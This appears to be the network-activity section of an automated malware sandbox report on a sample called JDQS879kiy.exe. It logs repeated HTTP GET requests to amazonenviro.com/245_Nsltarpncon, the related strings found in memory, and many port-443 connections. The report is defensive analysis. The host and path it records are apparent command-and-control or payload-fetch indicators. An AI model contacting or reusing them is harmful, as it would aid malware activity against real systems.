            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficDNS traffic detected: DNS query: time.windows.com
            Source: global trafficDNS traffic detected: DNS query: amazonenviro.com
            Source: JDQS879kiy.exe, 00000000.00000002.2621413099.000000000060A000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.2216997321.0000000000640000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000002.2621413099.000000000055E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/
            Source: JDQS879kiy.exe, 00000000.00000003.1427699073.00000000005E8000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.1493484348.000000000060A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/&
            Source: JDQS879kiy.exe, 00000000.00000003.2491979237.000000000060A000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.1493484348.000000000060A000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.1607710689.0000000000609000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.2200133806.000000000060A000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000002.2621413099.000000000060A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/0X_6
            Source: JDQS879kiy.exe, 00000000.00000002.2621413099.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.2200826171.0000000000589000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.1493484348.0000000000614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpncon
            Source: JDQS879kiy.exe, 00000000.00000003.1427699073.00000000005E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpncon$
            Source: JDQS879kiy.exe, 00000000.00000003.2491979237.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.2200133806.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000002.2621413099.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpncon(u
            Source: JDQS879kiy.exe, 00000000.00000003.1493484348.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.2217070241.000000000062E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpncon0
            Source: JDQS879kiy.exe, 00000000.00000003.1493484348.0000000000614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpncon2
            Source: JDQS879kiy.exe, 00000000.00000003.2199981648.000000000062E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpncon5
            Source: JDQS879kiy.exe, 00000000.00000003.1607710689.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.2491979237.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpncon6r
            Source: JDQS879kiy.exe, 00000000.00000003.2200826171.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.1493484348.00000000005F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_NsltarpnconH
            Source: JDQS879kiy.exe, 00000000.00000003.1607710689.00000000005F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_NsltarpnconRS
            Source: JDQS879kiy.exe, 00000000.00000003.1427699073.00000000005E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_NsltarpnconU
            Source: JDQS879kiy.exe, 00000000.00000003.2491979237.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_NsltarpnconYu
            Source: JDQS879kiy.exe, 00000000.00000002.2635679583.00000000205E6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpnconax
            Source: JDQS879kiy.exe, 00000000.00000003.2199981648.000000000062E000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.2217070241.000000000062E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpnconb
            Source: JDQS879kiy.exe, 00000000.00000003.2199981648.000000000062E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpnconh
            Source: JDQS879kiy.exe, 00000000.00000003.2200133806.00000000005F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_NsltarpnconnR
            Source: JDQS879kiy.exe, 00000000.00000003.1427699073.00000000005E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_NsltarpnconrTw
            Source: JDQS879kiy.exe, 00000000.00000002.2621413099.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpnconru
            Source: JDQS879kiy.exe, 00000000.00000003.1493484348.00000000005F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpncont
            Source: JDQS879kiy.exe, 00000000.00000002.2621413099.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.2491979237.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.1493484348.00000000005F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_NsltarpnconzR~
            Source: JDQS879kiy.exe, 00000000.00000003.1493484348.000000000060A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/6
            Source: JDQS879kiy.exe, 00000000.00000003.1493484348.000000000060A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/F
            Source: JDQS879kiy.exe, 00000000.00000003.1427699073.00000000005E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/Qu
            Source: JDQS879kiy.exe, 00000000.00000003.1493484348.000000000060A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/V
            Source: JDQS879kiy.exe, 00000000.00000002.2621413099.000000000060A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/f
            Source: JDQS879kiy.exe, 00000000.00000002.2621413099.000000000055E000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.2200826171.0000000000589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_Nsltarpncon
            Source: JDQS879kiy.exe, 00000000.00000003.2200826171.0000000000589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_Nsltarpncon$
            Source: JDQS879kiy.exe, 00000000.00000003.2200826171.0000000000589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_Nsltarpncon&
            Source: JDQS879kiy.exe, 00000000.00000003.1810514593.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_Nsltarpncon1
            Source: JDQS879kiy.exe, 00000000.00000003.2200826171.0000000000589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_Nsltarpncon4
            Source: JDQS879kiy.exe, 00000000.00000003.1810514593.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_Nsltarpncon9
            Source: JDQS879kiy.exe, 00000000.00000003.2200826171.0000000000589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_NsltarpnconS
            Source: JDQS879kiy.exe, 00000000.00000003.1810514593.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_Nsltarpncona
            Source: JDQS879kiy.exe, 00000000.00000003.2200826171.0000000000589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_Nsltarpnconr
            Source: JDQS879kiy.exe, 00000000.00000002.2621413099.000000000055E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_NsltarpncontDs
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
            Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
            Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
            Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
            Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
            Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
            Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
            Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
            Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
            Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
            Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
            Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
            Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
            Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
            Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
            Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
            Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
            Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
            Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
            Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
            Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
            Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
            Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
            Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
            Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
            Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
            Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
            Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
            Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
            Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
            Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
            Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
            Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
            Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
            Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
            Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
            Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
            Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
            Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
            Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
            Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
